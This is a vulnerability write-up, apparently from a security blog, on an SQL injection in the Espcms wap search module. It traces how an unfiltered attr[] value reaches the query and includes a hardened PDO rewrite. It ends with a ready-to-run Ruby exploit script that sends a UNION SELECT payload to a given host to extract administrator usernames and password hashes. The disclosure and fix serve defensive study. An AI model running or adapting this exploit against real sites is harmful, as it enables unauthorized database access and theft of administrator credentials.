Espcms wap module SQL injection

Category: 漏洞时代
Summary

The variable flows through $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along this path is filtered, which is what makes the injection possible.

Precisely because the variable is read from $_SERVER['QUERY_STRING'], it bypasses the program's own input filtering entirely.

Moreover, the injected variable is an array value rather than an array key, so it is not filtered either; taken together this produces a rather unusual SQL injection.

In the in_result function of /interface/3gwap_search.php:
function in_result() {
    // ... ... ... ... ... ... ... ... ...
    // read the data from $_SERVER['QUERY_STRING']
    $urlcode = $_SERVER['QUERY_STRING'];
    parse_str(html_entity_decode($urlcode), $output);
    // ... ... ... ... ... ... ... ... ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                // the key is filtered, the value is overlooked
                $key = addslashes($key);
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                // $countnum must be > 0 here
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // the value is concatenated into the SQL statement
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    // concatenated into the SQL statement
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    // executed
    $rs = $this->db->query($sql);
    // ... ... ... ... ... ... ... ... ...
}
Therefore, if an array is passed in and its key is constructed accordingly, SQL injection can be achieved.
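As an added illustration, not Espcms code, here is the same attr[] handling rewritten so that the attribute name is validated as an identifier and checked against model_att with a bound parameter, and the value is bound instead of concatenated. It assumes a PDO handle $pdo, the espcms_ table prefix, and a WHERE 1=1 base clause standing in for the elided part of $db_where.

```php
<?php
// Added example, not Espcms code: hardened rewrite of the attr[] handling in
// in_result(). Assumptions: a PDO handle $pdo, the "espcms_" table prefix and
// attribute names stored in espcms_model_att.attrname (the original's lookup).

function build_attr_where(PDO $pdo, array $output, string $prefix): array
{
    $where  = '';
    $params = [];
    $attrs  = $output['attr'] ?? null;
    if (!is_array($attrs)) {
        return [$where, $params];
    }
    // Same existence check as the original, but the name is bound, not inlined.
    $check = $pdo->prepare(
        "SELECT COUNT(*) FROM {$prefix}model_att WHERE isclass=1 AND attrname=?"
    );
    $n = 0;
    foreach ($attrs as $key => $value) {
        $key = (string) $key;
        if (!is_scalar($value) || $value === '') {
            continue;
        }
        // The key becomes a column name, so it must match an identifier pattern
        // AND exist in model_att before it is used; addslashes() is not enough.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $key)) {
            continue;
        }
        $check->execute([$key]);
        if ((int) $check->fetchColumn() === 0) {
            continue;
        }
        // The value is never concatenated: it is passed as a bound parameter.
        $ph = ':attr' . $n++;
        $where .= " AND b.`{$key}` = {$ph}";
        $params[$ph] = (string) $value;
    }
    return [$where, $params];
}

// Usage: parse as the original does, then bind (WHERE 1=1 stands in for the
// elided base clause of $db_where).
$prefix = 'espcms_';
parse_str(html_entity_decode($_SERVER['QUERY_STRING'] ?? ''), $output);
[$attrWhere, $params] = build_attr_where($pdo, $output, $prefix);
$sql = "SELECT b.*, a.* FROM {$prefix}document AS a"
     . " LEFT JOIN {$prefix}document_attr AS b ON a.did=b.did"
     . " WHERE 1=1" . $attrWhere . " LIMIT 0,15";
$stmt = $pdo->prepare($sql);
$stmt->execute($params);
```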

PoC:
require "net/http"
require "uri"

def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage =<<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]
  puts "[*]send request..."
  url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
  response = request("get", url)
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end